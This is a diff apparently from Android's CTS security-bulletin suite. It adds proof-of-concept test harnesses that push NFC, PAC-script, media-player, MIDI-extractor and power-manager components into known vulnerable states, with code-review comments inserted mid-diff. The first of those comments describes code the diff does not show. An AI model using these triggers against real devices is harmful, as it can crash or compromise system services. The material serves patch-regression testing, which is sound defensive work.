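Review bot: The `NFC_HDR` that main() allocates with `malloc(sizeof(NFC_HDR))` is handed to `p_cb->p_cback` without any of its fields being assigned, so whatever the callback reads from the header is heap garbage and the outcome can differ from run to run. The CVE-2021-0430 PoC in this same change sets `len` and `offset` explicitly before dispatching; doing the same here, for example allocating with `calloc(1, sizeof(NFC_HDR))` and then assigning the values the test intends, would make the result reproducible. The early `return EXIT_FAILURE` paths also leave `enable_selective_overload` at `ENABLE_ALL`, which is harmless at process exit but inconsistent with the success path.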
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp
new file mode 100644
index 00000000000..cbe6a4e9f02
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2020-0073",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/include",
+ "system/nfc/src/gki/ulinux",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
new file mode 100644
index 00000000000..d6ea4462558
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include <nfc_api.h>
+#include <rw_int.h>
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void rw_t2t_handle_rsp(uint8_t* p_data);
+void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) {
+ (void)event;
+ (void)p_rw_data;
+}
+
+int main() {
+ tRW_T2T_CB* p_t2t = &rw_cb.tcb.t2t;
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+ p_t2t->state = RW_T2T_STATE_DETECT_TLV;
+ p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
+ p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
+ p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
+ p_t2t->bytes_count = 1;
+ p_t2t->num_lockbytes = RW_T2T_MAX_LOCK_BYTES;
+ uint8_t data[T2T_READ_DATA_LEN];
+ rw_t2t_handle_rsp(data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp
new file mode 100644
index 00000000000..084a1fe3d2c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/Android.bp
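Review bot: `uint8_t data[T2T_READ_DATA_LEN];` in main() is passed to `rw_t2t_handle_rsp` without being initialised, so the bytes the handler parses are whatever happened to be on the stack and the test result is not reproducible across builds or devices. Initialise the buffer, at minimum `uint8_t data[T2T_READ_DATA_LEN] = {};`, or fill it with the specific bytes the test depends on. A short comment above the `p_t2t->...` assignments saying which handler state they are meant to reach would also help the next maintainer, since the values are otherwise unexplained.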
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0224",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ shared_libs: [
+ "libpac",
+ ],
+ srcs: [
+ "poc.cpp",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp
new file mode 100644
index 00000000000..de62221ca8e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0224/poc.cpp
@@ -0,0 +1,60 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <codecvt>
+#include <fstream>
+#include "../includes/common.h"
+#include <proxy_resolver_v8_wrapper.h>
+
+using namespace std;
+
+void poc(char* raw) {
+ ProxyResolverV8Handle* handle = ProxyResolverV8Handle_new();
+ string u8Script(raw);
+ u16string u16Script =
+ wstring_convert<codecvt_utf8_utf16<char16_t>, char16_t> { }
+ .from_bytes(u8Script);
+
+ ProxyResolverV8Handle_SetPacScript(handle, u16Script.data());
+ const char16_t* spec = u"", *host = u"";
+ ProxyResolverV8Handle_GetProxyForURL(handle, spec, host);
+ ProxyResolverV8Handle_delete(handle);
+}
+
+int main(int argc, char **argv) {
+ if (argc != 2) {
+ return EXIT_FAILURE;
+ }
+
+ ifstream stream;
+ stream.open(argv[1]);
+ if (stream.rdstate() != ifstream::goodbit) {
+ return EXIT_FAILURE;
+ }
+
+ stream.seekg(0, ios::end);
+ size_t size = stream.tellg();
+ stream.seekg(0);
+ char* raw = (char*) calloc(size + 1, sizeof(char));
+ stream.read(raw, size);
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ poc(raw);
+ }
+
+ free(raw);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp
new file mode 100644
index 00000000000..f45207f0655
--- /dev/null
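Review bot: In main() the result of `calloc(size + 1, sizeof(char))` is passed straight to `stream.read(raw, size)` without a null check, and `size` comes from `stream.tellg()`, which returns -1 on failure and becomes a very large `size_t`. Check both before reading: keep the `tellg()` result in a signed variable and return `EXIT_FAILURE` if it is negative, then add `if (!raw) return EXIT_FAILURE;` after the allocation. In poc(), `from_bytes` can throw on input that is not valid UTF-8 (as far as I know it raises `std::range_error` when no error string was supplied), and an uncaught exception would abort the harness itself, so either catch it or document that the input file must be valid UTF-8.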
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0243",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libutils",
+ "libbinder",
+ "libutilscallstack",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp
new file mode 100644
index 00000000000..5841427f76f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp
@@ -0,0 +1,97 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+#include "../includes/common.h"
+
+using namespace android;
+
+typedef struct ThreadParams {
+ sp<IBinder> service;
+} ThreadParams;
+
+static void *thread_getParameter(void *p) {
+ ThreadParams *params = (ThreadParams *)p;
+ int err;
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ Parcel data, reply;
+ data.writeInterfaceToken(params->service->getInterfaceDescriptor());
+ int key = (('m') << 24 | ('t') << 16 | ('r') << 8 | ('X'));
+ data.writeInt32(key);
+ err = params->service->transact(/*GET_PARAMETER_ID*/ 31, data, &reply, 0);
+ if (err == EPIPE) {
+ break;
+ }
+ usleep(5000);
+ }
+ return nullptr;
+}
+
+int main() {
+ status_t err;
+ sp<IServiceManager> sm = defaultServiceManager();
+ String16 name(String16("media.player"));
+ sp<IBinder> service = sm->checkService(name);
+ sp<IBinder> binder = nullptr;
+ if (not service) {
+ return EXIT_FAILURE;
+ }
+
+ String16 interface_name = service->getInterfaceDescriptor();
+ Parcel data, reply;
+ data.writeInterfaceToken(interface_name);
+ data.writeStrongBinder(new BBinder());
+ for (int i = 0; i < 1024; ++i)
+ data.writeInt32(1);
+ if (service) {
+ err = service->transact(/*CREATE_ID*/ 1, data, &reply, 0);
+ binder = reply.readStrongBinder();
+ }
+
+ if (not binder) {
+ return EXIT_FAILURE;
+ }
+
+ pthread_t t1, t2;
+
+ ThreadParams *params = new ThreadParams();
+ params->service = binder;
+ pthread_create(&t1, nullptr, thread_getParameter, params);
+ pthread_create(&t2, nullptr, thread_getParameter, params);
+
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ if (not binder) {
+ break;
+ }
+ Parcel data, reply;
+ data.writeInterfaceToken(binder->getInterfaceDescriptor());
+ data.writeStrongBinder(binder);
+ err = binder->transact(/*SET_DATA_SOURCE_URL_ID*/ 2, data, &reply, 0);
+ if (err == EPIPE) {
+ break;
+ }
+ usleep(500000);
+ }
+
+ pthread_join(t1, nullptr);
+ pthread_join(t2, nullptr);
+ delete params;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp
new file mode 100644
index 00000000000..1965f503b76
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp
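Review bot: The early-exit checks `if (err == EPIPE)` in both `thread_getParameter` and the loop in main() can never fire, because `transact` returns a `status_t` whose error values are negative; a dead remote is reported as `DEAD_OBJECT`, which libutils defines as `-EPIPE`. As written all three loops keep issuing transactions until the timer expires, even after the remote has gone away. Compare against the status constant instead: `if (err == DEAD_OBJECT) { break; }`. The `if (not binder)` test inside the main loop is also always false, since `binder` is not reassigned after the earlier null check, and the two `pthread_create` results are unchecked before `pthread_join`.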
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0383",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp
new file mode 100644
index 00000000000..313f21a7f56
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp
@@ -0,0 +1,129 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + 
::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp index 70c3eedfbf2..c32cb4a1c7e 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp @@ -27,9 +27,6 @@ cc_test { "-DENABLE_SELECTIVE_OVERLOADING", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "system/nfc/src/nfc/include/", 
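Review bot: `XMFDataSource::readAt` ignores the result of every `read` and `lseek`, and copies `infoSize` bytes into `data` without comparing it to the caller's `size`. Once the info file is exhausted, `infoSize` and `infoOffset` are uninitialised, and a record larger than the requested size makes the harness itself write past the extractor's buffer, which a `-DCHECK_OVERFLOW` build could then attribute to the library. Assuming the recorded sizes are meant to match what the extractor asks for, the method should check each call and bound the copy, as sketched below. The early `return EXIT_FAILURE` paths in main() also leave `enable_selective_overload` at `ENABLE_ALL`, unlike the success path.

```cpp
  virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
                         size_t size) {
    uint32_t infoOffset = 0, infoSize = 0;
    // Stop when the info file is exhausted instead of reusing stale values.
    if (read(mFdInfo, &infoSize, sizeof(infoSize)) != sizeof(infoSize) ||
        read(mFdInfo, &infoOffset, sizeof(infoOffset)) != sizeof(infoOffset)) {
      return -1;
    }
    // Never copy more than the caller's buffer can hold.
    if (infoSize > size) {
      return -1;
    }
    if (lseek(mFdData, infoOffset, SEEK_SET) < 0 ||
        read(mFdData, data, infoSize) < 0) {
      return -1;
    }
    return size;
  }
```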
@@ -41,7 +38,6 @@ cc_test { shared_libs: [ "libnfc-nci", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp index 1876c60bcf0..1c231b77c2f 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp @@ -22,14 +22,10 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { shared_libs: [ "libmediandk", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp new file mode 100644 index 00000000000..5cad1e4e82c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2021-0430", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} + 
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
new file mode 100644
index 00000000000..947f46a2007
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
@@ -0,0 +1,87 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_int.h>
+#include <rw_int.h>
+
+#define RW_MFC_STATE_READ_NDEF 0x03
+#define RW_MFC_SUBSTATE_READ_BLOCK 0x03
+
+extern tRW_CB rw_cb;
+
+void GKI_freebuf(void*) {
+}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {
+}
+
+void GKI_stop_timer(uint8_t) {
+}
+
+void cback(tRW_EVENT, tRW_DATA*) {
+}
+
+int main() {
+ tRW_MFC_CB* p_mfc = &rw_cb.tcb.mfc;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t selres = 1;
+ uint8_t uid[MFC_UID_LEN] = { 1 };
+ if (rw_mfc_select(selres, uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ p_mfc->state = RW_MFC_STATE_READ_NDEF;
+ p_mfc->substate = RW_MFC_SUBSTATE_READ_BLOCK;
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+
+ tNFC_CONN* p_data = (tNFC_CONN*) malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.status = NFC_STATUS_OK;
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ NFC_HDR* mfc_data = (NFC_HDR*) p_data->data.p_data;
+ mfc_data->len = 0x10;
+ mfc_data->offset = 0;
+ p_mfc->ndef_length = 1024;
+ p_mfc->p_ndef_buffer = (uint8_t*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_mfc->p_ndef_buffer)) {
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ rw_cb.p_cback = cback;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_mfc->p_ndef_buffer);
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp
new file mode 100644
index 00000000000..5cfd2f5c0bc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0439",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp"
+ ],
+ shared_libs : [
+ "libutils",
+ "libbinder",
+ ],
+ cflags: [
+ "-DDO_NOT_CHECK_MANUAL_BINDER_INTERFACES",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp
new file mode 100644
index 00000000000..65cab130f75
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp
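Review bot: The buffer behind `p_data->data.p_data` is allocated as `malloc(sizeof(uint8_t) * 16)` but is then used as an `NFC_HDR` whose `len` is set to `0x10`, so the header plus the sixteen payload bytes it advertises cannot fit in the harness's own sixteen-byte allocation. Any payload access by the callback would run past the test's input buffer, and the payload bytes are never initialised either, so a report from this test cannot be cleanly attributed to the library. Unless the short buffer is deliberate, in which case a comment should say so, size it for both parts and zero it: `p_data->data.p_data = (NFC_HDR*) calloc(1, sizeof(NFC_HDR) + 16);`.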
@@ -0,0 +1,49 @@
+/*
+ * Copyright 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+using namespace android;
+
+int main() {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> binder = sm->getService(String16("power"));
+ if (!binder) {
+ return EXIT_FAILURE;
+ }
+ Parcel data, result;
+ data.writeInterfaceToken(String16("android.os.IPowerManager"));
+ char d[] = {static_cast<char>(0xc9),
+ static_cast<char>(0xa4),
+ 0x10,
+ static_cast<char>(0xd4),
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x27,
+ 0x00,
+ 0x5a,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00};
+ data.write(d, sizeof(d));
+ binder->transact(6, data, &result);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index a028330f3de..cf48079bef1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
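Review bot: The transaction code `6` and the sixteen-byte array `d` in main() are bare literals with no explanation, which makes the test hard to maintain if the interface's method numbering changes between releases. The CVE-2020-0243 PoC in this same change annotates its codes inline (`/*CREATE_ID*/ 1`); the same convention here would read `binder->transact(/*<IPowerManager method name>*/ 6, data, &result);`, plus a one-line comment above `d` describing the argument layout it encodes. The return value of `transact` is also dropped, so a rejected call and a delivered one both end in `EXIT_SUCCESS`; logging the status would make triage easier.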
@@ -23,6 +23,7 @@ import com.android.compatibility.common.util.ResultUnit; import com.android.ddmlib.IShellOutputReceiver; import com.android.ddmlib.NullOutputReceiver; import com.android.ddmlib.CollectingOutputReceiver; +import com.android.tradefed.device.DeviceNotAvailableException; import com.android.tradefed.device.ITestDevice; import com.android.tradefed.device.NativeDevice; import com.android.tradefed.log.LogUtil.CLog; @@ -34,6 +35,7 @@ import java.io.InputStream; import java.io.OutputStream; import java.util.concurrent.TimeoutException; import java.util.List; +import java.util.Map; import java.util.regex.Pattern; import java.util.concurrent.TimeUnit; import java.util.Scanner; @@ -48,8 +50,9 @@ import org.json.JSONObject; import java.util.regex.Pattern; import java.lang.Thread; + import static org.junit.Assert.*; -import junit.framework.Assert; +import static org.junit.Assume.*; public class AdbUtils { @@ -60,6 +63,7 @@ public class AdbUtils { public static class pocConfig { String binaryName; String arguments; + Map<String, String> envVars; String inputFilesDestination; ITestDevice device; CrashUtils.Config config; 
@@ -162,8 +166,25 @@ public class AdbUtils { */ public static int runPoc(String pocName, ITestDevice device, int timeout, String arguments, IShellOutputReceiver receiver) throws Exception { + return runPoc(pocName, device, timeout, arguments, null, receiver); + } + + /** + * Pushes and runs a binary with arguments to the selected device and + * ignores any of its output. + * + * @param pocName name of the poc binary + * @param device device to be ran on + * @param timeout time to wait for output in seconds + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param receiver the type of receiver to run against + */ + public static int runPoc(String pocName, ITestDevice device, int timeout, + String arguments, Map<String, String> envVars, + IShellOutputReceiver receiver) throws Exception { String remoteFile = String.format("%s%s", TMP_PATH, pocName); - SecurityTestCase.getPocPusher(device).pushFile(pocName, remoteFile); + SecurityTestCase.getPocPusher(device).pushFile(pocName + "_sts", remoteFile); assertPocExecutable(pocName, device); if (receiver == null) { 
